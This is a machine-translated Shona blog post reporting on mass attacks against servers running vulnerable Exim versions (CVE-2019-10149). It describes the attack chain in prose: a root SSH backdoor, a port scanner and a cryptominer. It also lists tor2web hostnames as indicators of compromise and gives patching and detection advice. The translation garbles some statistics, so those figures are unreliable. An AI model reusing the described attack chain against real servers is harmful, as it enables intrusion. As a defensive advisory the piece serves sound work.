ProHoster > Blog > internet nhau > Kurwiswa kwakawanda pamaseva ari munjodzi eExim-based mail

Kurwiswa kwakawanda pamaseva ari munjodzi eExim-based mail

Cybereason Security Researchers yambiro vatariri vemaseva etsamba nezvekuonekwa kwekurwisa kukuru kweotomatiki kunoshandisa kukanganiswa kwakanyanya (CVE-2019-10149) muExim, yakaonekwa svondo rapfuura. Munguva yekurwiswa, vanorwisa vanowana kuurayiwa kwekodhi yavo semudzi uye kuisa malware pane sevha yekuchera cryptocurrencies.

Chikumi otomatiki ongororo iyo mugove weExim i57.05% (gore rapfuura 56.56%), Postfix inoshandiswa pa34.52% (33.79%) yemaseva etsamba, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%). By kupihwa yeShodan sevhisi, anopfuura 3.6 miriyoni mail maseva ari pasi rese network anoramba ari munjodzi, ayo asina kuvandudzwa kune yazvino kuburitswa kweExim 4.92. Anenge mamirioni maviri angangoita munjodzi maseva ari muUS, 2 zviuru muRussia. By ruzivo RiskIQ yakatokwidziridza 4.92% yemaseva eExim kuita shanduro 70.

Kurwiswa kwakawanda pamaseva ari munjodzi eExim-based mail

Mamaneja anorairwa kuti akurumidze kuisa zvigadziriso zvakagadzirirwa nekugoverwa svondo rapfuura (Debian, Ubuntu, vhura, Arch Linux, Fedora, EPEL yeRHEL/CentOS) Kana iyo sisitimu iine isina njodzi vhezheni yeExim (kubva pa4.87 kusvika 4.91 inosanganisirwa), iwe unofanirwa kuve nechokwadi chekuti sisitimu haisati yatokanganiswa nekutarisa crontab yekufungidzira mafoni uye ita shuwa kuti hapana mamwe makiyi mu /root/. ssh directory. Kurwiswa kunogonawo kuratidzwa nekuvapo mune firewall log yezviitiko kubva kune vanogamuchira an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io uye an7kmd2wp4xo7hpr.onion.sh, iyo inoshandiswa panguva yekurodha malware.

Kutanga kurwiswa pamaseva eExim fixed 9 June. Pakazosvika June 13 kurwisa zvakagamuchirwa mass hunhu. Mushure mekushandisa kusazvibata kuburikidza ne tor2web magedhi, script inotakurwa kubva kuTor yakavanzika sevhisi (an7kmd2wp4xo7hpr) inoongorora kuvepo kweOpenSSH (kana zvisiri. sets), inoshandura marongero ayo (inobvumira midzi yekupinda uye kiyi yekusimbisa) uye inoseta mudzi mushandisi kuti RSA kiyiA iyo inopa rombo rekuwana kune sisitimu kuburikidza neSSH.

Mushure mekugadzirisa backdoor, port scanner inoiswa musystem kuti ione mamwe maseva ari panjodzi. Iyo zvakare inotsvaga sisitimu yezvicherwa zviripo, izvo zvinodzimwa kana zvaonekwa. Padanho rekupedzisira, wako mugodhi anoremerwa uye akanyoreswa mucrontab. Mugodhi wacho anotorwa pasi pechifukidziro cheico faira (chaizvoizvo, i zip archive ine "hapana-password" password), iyo inorongedza faira rinogoneka muELF fomati yeLinux ine Glibc 2.7+.

Source: opennet.ru

Voeg